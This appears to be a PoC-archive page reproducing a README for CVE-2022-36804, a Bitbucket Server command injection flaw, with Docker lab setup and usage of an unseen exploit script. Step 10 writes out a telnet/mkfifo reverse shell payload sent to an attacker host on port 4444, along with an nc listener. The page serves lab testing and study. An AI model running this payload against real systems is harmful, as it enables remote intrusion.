关联漏洞
标题:
Atlassian Bitbucket Server 安全漏洞
(CVE-2022-36804)
描述:Atlassian Bitbucket Server是澳大利亚Atlassian公司的一款Git代码托管解决方案。该方案能够管理并审查代码,具有差异视图、JIRA集成和构建集成等功能。 Atlassian Bitbucket Server and Data Center存在安全漏洞,该漏洞源于允许对公共或私有Bitbucket库有读取权限的远程攻击者通过发送恶意的HTTP请求执行任意代码。以下产品及版本受到影响:7.0.0 至 7.6.17 之前版本,7.7.0 至 7.17.10 之前版本,7.18.0
介绍
<h1 style="font-size:10vw" align="left">CVE-2022-36804 - Atlassian Bitbucket Server and Data Center Command Injection Vulnerability</h1>
<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-8.8 HIGH-red"> [](https://www.python.org/) <img src="https://img.shields.io/badge/Maintained%3F-Yes-96c40f">
******
⚠️ *For educational and authorized security research purposes only*
## Original Exploit Authors
Very grateful to the original PoC author [Walnut Security Services Pvt. Ltd](https://github.com/walnutsecurity)
## Description
Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.
******
## Step Guides
1. First, clone the repository
```bash
git clone https://github.com/asepsaepdin/CVE-2022-36804.git
```
2. Change directory
```bash
cd CVE-2022-36804
```
3. Build vuln container
```bash
docker build -t CVE-2022-36804 .
```
5. Run ephemeral container
```bash
docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
```
6. Check container ip address
```bash
docker inspect CVE-2022-36804 | grep "IPAddress"
```
7. Setup Atlassian bitbucket and create new public repository by open URL: `http://172.17.0.3:7990`
8. Check for Remote Code Execution (RCE)
```bash
python3 cve-2022-36804.py -u http://172.17.0.3:7990
```
9. Check for RCE with customized command (cmd)
```bash
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
```
10. From an attacker perspective, remote code execution is critical to get access to an interactive shell. So, executing the following command would trigger a telnet reverse shell over tcp based on bash to attacker’s system on port 4444/tcp:
```bash
python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
```
```bash
nc -nlvp 4444
```
******
## Credits
- https://github.com/walnutsecurity/cve-2022-36804
- https://nvd.nist.gov/vuln/detail/cve-2022-36804
文件快照
[4.0K] /data/pocs/9d39116974192f85883339d91d29b5fce0b64b7a
├── [6.5K] cve-2022-36804.py
├── [ 443] Dockerfile
└── [2.6K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。